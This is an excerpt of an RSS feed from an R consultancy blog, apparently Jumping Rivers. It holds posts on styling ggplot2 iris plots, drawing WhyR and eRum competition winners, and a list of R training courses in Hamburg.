&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(iris, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Sepal.Length, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Sepal.Width)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_jitter&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Species)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;xlab&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Sepal length&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ylab&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Sepal width&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Improve axis labels&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggtitle&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;The infamous Iris plot&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# Title&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="plot2-1.svg" style="width:550px; class:image-center"&gt;
&lt;p&gt;The changes we’ve made so far would be impossible for any package to do for us - how would the package know the plot title? We can now improve the look and feel of the plot. There are two complementary ways of doing this: scales and themes. The ggplot scales control things like colours and point size. Version 3.0.0 of {ggplot2}, the latest at the time of writing, introduced the Viridis colour scales. This palette is particularly useful for creating colour-blind friendly plots:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_colour_viridis_d&lt;/span&gt;() &lt;span style="color:#8b949e;font-style:italic"&gt;# d for discrete&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The theme controls elements such as grid lines, fonts and labels. I’m partial to &lt;code&gt;theme_minimal()&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_colour_viridis_d&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="plot3-1.svg" style="width:550px; class:image-center"&gt;
&lt;h2 id="the-hrbrthemes-package"&gt;The hrbrthemes package&lt;/h2&gt;
&lt;p&gt;We don’t just have to use the themes that come with {ggplot2}; we can use themes provided by other packages. The {hrbrthemes} package contains a nice theme called &lt;code&gt;ipsum&lt;/code&gt; that&amp;rsquo;s similar to the minimal theme, but also tweaks the font and sub-headings. There is also an associated colour scheme called &lt;code&gt;scale_colour_ipsum()&lt;/code&gt;. An additional improvement we&amp;rsquo;ll make is to drop the legend and place the text directly on the chart. After loading the package&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;hrbrthemes&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;we create a data frame with the label positions&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;labels &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;data.frame&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5.3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;), y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;4.2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2.1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3.7&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Species &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Setosa&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Versicolor&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Virginica&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We construct the plot as usual&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(iris, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Sepal.Length, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Sepal.Width)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_jitter&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Species)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_ipsum&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Sepal length&amp;#34;&lt;/span&gt;, y&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Sepal width&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;The infamous Iris data set&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; subtitle &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Thanks @hrbrmstr for the theme&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; caption &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;jumpingrivers.com&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_colour_ipsum&lt;/span&gt;(guide &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_text&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; labels, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x, y, label &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Species, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Species)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;xlim&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="plot4-1.svg" style="width:550px; class:image-center"&gt;
&lt;p&gt;Notice we can add data from two data sets onto a ggplot with relative ease.&lt;/p&gt;
&lt;p&gt;Thanks for reading, see you next time!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/styling-ggplot2-r-graphics/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Why R 2018 Winners</title><link>https://www.jumpingrivers.com/blog/why-r-2018-winners/</link><pubDate>Mon, 02 Jul 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/why-r-2018-winners/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/why-r-2018-winners/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-r-2018-winners/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;So it’s here… After lots of entries (147 to be precise), we can finally announce the winner of the WhyR 2018 Competition! But first, we have to tell you quickly about how we picked the winner.&lt;/p&gt;
&lt;h2 id="how-we-did-it"&gt;How we did it&lt;/h2&gt;
&lt;p&gt;So it really wasn’t that hard. We held the questionnaire on &lt;a href="http://referral.typeform.com/mzcsnTI" rel="external"&gt;typeform&lt;/a&gt;. Conveniently, my colleague has created a package {rtypeform} which is an interface to the typeform API. You can install this from CRAN in the usual way&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rtypeform&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rtypeform&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The following code will give you a data frame called &lt;code&gt;q&lt;/code&gt; containing a column for each question contained in the &lt;code&gt;WhyR&lt;/code&gt; questionnaire.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;typeforms &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_all_typeforms&lt;/span&gt;()&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;content
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uid &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; typeforms[typeforms&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;WhyR&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;uid&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;q &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_questionnaire&lt;/span&gt;(uid)&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;completed
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now, obviously, we can’t give you access to this, so I’ve hidden the Jumping Rivers API key. But, provided you have your own API key assigned to the variable &lt;code&gt;typeform_api&lt;/code&gt;, this code will work (remember to change the questionnaire name!). With that, a bit of {dplyr} and the classic &lt;code&gt;sample()&lt;/code&gt;, we can generate a winner for the competition.&lt;/p&gt;
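&lt;p&gt;The draw itself is not shown in this post. A minimal sketch of how it might look, assuming one row per completed entry: the &lt;code&gt;entries&lt;/code&gt; data frame and its &lt;code&gt;name&lt;/code&gt; column are made up for illustration and stand in for the real &lt;code&gt;q&lt;/code&gt;, and base R is used instead of {dplyr} to keep the sketch dependency-free.&lt;/p&gt;

```r
# Hypothetical stand-in for the questionnaire data frame `q`;
# the real column names depend on the questionnaire.
entries = data.frame(
  name = c("Entrant A", "Entrant B", "Entrant B", "Entrant C"),
  stringsAsFactors = FALSE
)

# One ticket per entrant, even if somebody submitted twice
entrants = unique(entries$name)

set.seed(2018) # fix the seed so the draw can be reproduced
winner = sample(entrants, size = 1)
winner
```

&lt;p&gt;Setting the seed is optional, but it means the draw can be re-run and checked later.&lt;/p&gt;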
&lt;h2 id="the-winners"&gt;The winners&lt;/h2&gt;
&lt;p&gt;Drum roll please… the winner is…&lt;/p&gt;
&lt;p&gt;Agnieszka Fronczyk!&lt;/p&gt;
&lt;p&gt;Congratulations Agnieszka! We’ll see you in Wroclaw! Commiserations to all our unlucky participants. However, we are sponsoring more data science events to come so keep an eye out here for more competitions!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/why-r-2018-winners/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Competition: WhyR 2018</title><link>https://www.jumpingrivers.com/blog/competition-whyr-2018/</link><pubDate>Tue, 22 May 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/competition-whyr-2018/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/competition-whyr-2018/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/competition-whyr-2018/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/competition-whyr-2018/#the-competition"&gt;The competition&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It’s competition time! We’re sponsoring the Why R? 2018 Conference. The conference runs from the
&lt;em&gt;2-5th of July&lt;/em&gt; in &lt;strong&gt;&lt;em&gt;Wroclaw, Poland&lt;/em&gt;&lt;/strong&gt; and us nice folks here at &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt; are giving away a free ticket to the conference!&lt;/p&gt;
&lt;h2 id="the-competition"&gt;The competition&lt;/h2&gt;
&lt;p&gt;To enter your name into the prize draw all you have to do is follow one step: Step 1) Fill out this questionnaire (now closed). That’s it! Don’t worry, there are no intrusive personal questions. The winner will be decided by drawing one entrant at random. The closing time for entries is midnight on the 2nd June (we’ll take the most extreme time zone). That’s all, cheers!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/competition-whyr-2018/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>R Courses in Hamburg</title><link>https://www.jumpingrivers.com/blog/r-courses-in-hamburg/</link><pubDate>Wed, 09 May 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-courses-in-hamburg/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-courses-in-hamburg/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-courses-in-hamburg/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Big news: from the 13th till the 27th June, Jumping Rivers will be running 6 courses on R in &lt;em&gt;&lt;strong&gt;Hamburg!!&lt;/strong&gt;&lt;/em&gt; Each course runs for one day, apart from the &lt;em&gt;Predictive Analytics&lt;/em&gt; course, which runs for 2 days. The courses are as follows:&lt;/p&gt;
&lt;h2 id="introduction-to-r---13th"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/"&gt;Introduction to R - 13th&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;For this course, you need &lt;em&gt;no&lt;/em&gt; prior programming knowledge of any type! You will learn how to efficiently manipulate, plot, import and export data using R.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-r-courses-in-hamburg"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="mastering-the-tidyverse---14th"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-r-tidyverse/"&gt;Mastering the Tidyverse - 14th&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;A course on the suite of R packages known as the {tidyverse}. The {tidyverse} is essential for any statistician or data scientist who deals with data on a day-to-day basis. By focusing on small key tasks, the tidyverse suite of packages removes the pain of data manipulation. You will learn how to use packages at the forefront of cutting-edge data analytics such as {dplyr} and {tidyr}. Learn how to efficiently manage dates and times with {lubridate}, and how to import and export data from anything from CSV and Excel files to SAS and SPSS files using the fantastic {readr}, {readxl} and {foreign} packages.&lt;/p&gt;
&lt;h2 id="next-steps-in-the-tidyverse---15th"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-tidyverse-purrr-broom/"&gt;Next Steps in the Tidyverse - 15th&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;After mastering only half the potential of the tidyverse in &lt;strong&gt;Mastering the Tidyverse&lt;/strong&gt;, this course will cover other {tidyverse} essentials. Tired of writing &lt;em&gt;for&lt;/em&gt; loops? Look no further, the {purrr} package provides a complete and consistent set of tools for working with functions and vectors. Learn how to use {stringr}, regular expressions and {tidytext}, providing you with the tools for complex string and text analysis.&lt;/p&gt;
&lt;h2 id="automated-reporting-first-steps-towards-shiny---20th"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/automated-reporting-first-steps-towards-shiny/"&gt;Automated Reporting (First Steps Towards Shiny) - 20th&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Tired of having to write a new report for every single data set? With &lt;strong&gt;R Markdown&lt;/strong&gt; and {knitr}, you can build interactive reports, documents and dashboards that update when your data updates!&lt;/p&gt;
&lt;h2 id="interactive-graphics-with-shiny---21st"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-shiny-application-web/"&gt;Interactive Graphics with Shiny - 21st&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;The R package {shiny} allows you to create cutting-edge, interactive web graphics and applications that react to your data in a new and innovative way. Not only that, but {shiny} provides a platform where you can host your web applications for free!&lt;/p&gt;
&lt;h2 id="predictive-analytics---2728th"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-predictive-analytics-machine-learning/"&gt;Predictive Analytics - 27/28th&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;You will learn about popular analytical techniques practised in industry today such as simple regression, clustering, discriminant analysis, random forests, splines and many more. Of course, by the end of the course, you will be able to use R to apply these methods to your data, often in &lt;em&gt;one line&lt;/em&gt; of code! For any more info, visit us at &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;jumpingrivers.com&lt;/a&gt; or feel free to email me at &lt;em&gt;&lt;a href="mailto:theo@jumpingrivers.com" rel="external"&gt;theo@jumpingrivers.com&lt;/a&gt;&lt;/em&gt;. Cheers!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-courses-in-hamburg/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>eRum Competition Winners</title><link>https://www.jumpingrivers.com/blog/erum-competition-winners/</link><pubDate>Fri, 20 Apr 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/erum-competition-winners/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/erum-competition-winners/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/erum-competition-winners/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/erum-competition-winners/#the-main-competition"&gt;The Main Competition&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/erum-competition-winners/#the-secondary-competition"&gt;The Secondary Competition&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/erum-competition-winners/#what-next"&gt;What next?&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The results of the eRum &lt;a href="https://www.jumpingrivers.com/blog/free-ticket-to-erum/"&gt;competition&lt;/a&gt; are in! Before we announce the winners we would like to thank everyone who entered. It has been a pleasure to look at all of the ideas on show.&lt;/p&gt;
&lt;h3 id="the-main-competition"&gt;The Main Competition&lt;/h3&gt;
&lt;p&gt;The winner of the main competition is Lukasz Janiszewski. Lukasz provided a fantastic visualisation of the locations of each R user/ladies group and all R conferences. You can see his application &lt;a href="https://ch2m.shinyapps.io/erum_jr/" rel="external"&gt;here&lt;/a&gt;. If you want to view his code, you are able to do so in this &lt;a href="https://github.com/lukuiR/Rpublic" rel="external"&gt;GitHub repo&lt;/a&gt;. The code is contained in the directory &lt;code&gt;erum_jr&lt;/code&gt; and the data preparation can be seen in &lt;code&gt;budap.R&lt;/code&gt;. Lukasz made 3 CSV files containing the information about the R user groups, R-Ladies groups and R conferences. With the help of &lt;a href="https://www.r-bloggers.com/osm-nominatim-with-r-getting-locations-geo-coordinates-by-its-address/" rel="external"&gt;an R-bloggers post&lt;/a&gt;, he was able to add the geospatial information to those CSV files. Finally, he scraped each meetup page for information on the R-Ladies groups. Using all of this information, he was able to make an informative, visually appealing dashboard with {shiny}. Lukasz will now be jetting off to Budapest, to eRum 2018!&lt;/p&gt;
&lt;h3 id="the-secondary-competition"&gt;The Secondary Competition&lt;/h3&gt;
&lt;p&gt;The winner of the secondary competition is Jenny Snape. Jenny provided an excellent script to parse the current .Rmd files and extract the conference and group URLs &amp;amp; locations. The script can be found in this &lt;a href="https://gist.github.com/jumpingrivers/a05f8ae598747be49679b0b75790f2e2" rel="external"&gt;GitHub gist&lt;/a&gt;. Jenny has written a few words to summarise her script… “The files on GitHub can be read into R as character vectors (where each line is an element of the vector) using the R &lt;code&gt;readLines()&lt;/code&gt; function. From this character vector, we need to extract the country, the group name and url. This can be done by recognising that each line containing a country starts with a ‘##’ and each line containing the group name and url starts with a ‘*’. Therefore we can use these ‘tags’ to cycle through each element of the character vector and pull out vectors containing the countries, the cities and the urls of the R groups. These vectors can then be cleaned and joined together into a data frame. I wrote these steps into a function that accepted each R group character vector as an input and returned the final data frame. As one of the data sets contained just R Ladies groups, I fed this in as an argument and returned it as a column in the final data frame in order to differentiate between the different group types. I also returned a variable based on the character vector input in order to differentiate between the different world continents. Running this function on each of the character vectors creates separate data sets which can then be all joined together. This creates a final dataset containing all the information on each R group: the type of group, the url, the city and the region.”&lt;/p&gt;
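&lt;p&gt;To make the idea concrete, here is a rough sketch of the tag-based parsing Jenny describes. It is not her script (see the gist for that): the function name &lt;code&gt;parse_groups()&lt;/code&gt;, the example lines and the assumption that each ‘*’ line holds a markdown-style &lt;code&gt;[name](url)&lt;/code&gt; link are all ours, purely for illustration.&lt;/p&gt;

```r
# Hypothetical excerpt in the layout described above: "##" lines hold a
# country, "*" lines hold a group written as a markdown link (an assumption).
lines = c(
  "## Poland",
  "* [Example City A R Users](https://example.com/city-a)",
  "* [Example City B R Users](https://example.com/city-b)",
  "## Hungary",
  "* [Example City C R Users](https://example.com/city-c)"
)
# In practice the lines would come from something like readLines("groups.Rmd")

parse_groups = function(lines, type = "useR") {
  is_country = startsWith(lines, "##")
  is_group = startsWith(lines, "*")

  # Running count of country headings: tells us which country each line sits under
  idx = cumsum(is_country)
  keep = is_group
  keep[idx == 0] = FALSE # ignore bullets that appear before any country

  countries = sub("^##[[:space:]]*", "", lines[is_country])
  group_lines = lines[keep]

  data.frame(
    country = countries[idx[keep]],
    group = sub("^\\*[[:space:]]*\\[([^]]*)\\].*$", "\\1", group_lines),
    url = sub("^.*\\(([^)]*)\\).*$", "\\1", group_lines),
    type = type, # e.g. "useR" or "R-Ladies", passed in by the caller
    stringsAsFactors = FALSE
  )
}

groups = parse_groups(lines, type = "useR")
groups
```

&lt;p&gt;Running the function once per file, with a different &lt;code&gt;type&lt;/code&gt; each time, and binding the results with &lt;code&gt;rbind()&lt;/code&gt; would give a single data frame along the lines Jenny describes.&lt;/p&gt;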
&lt;p&gt;As well as this, Jenny provided us with a fantastic &lt;a href="https://jennifersnape.shinyapps.io/leaflet_app/" rel="external"&gt;{shiny} dashboard&lt;/a&gt;, summarising the data. Jenny has now received a free copy of &lt;a href="http://shop.oreilly.com/?cmp=af-npa--storehome_cj_11257098_4003003" rel="external"&gt;Efficient R Programming&lt;/a&gt;! Once again, thank you to all who entered and well done to our winners, Lukasz and Jenny!&lt;/p&gt;
&lt;h3 id="what-next"&gt;What next?&lt;/h3&gt;
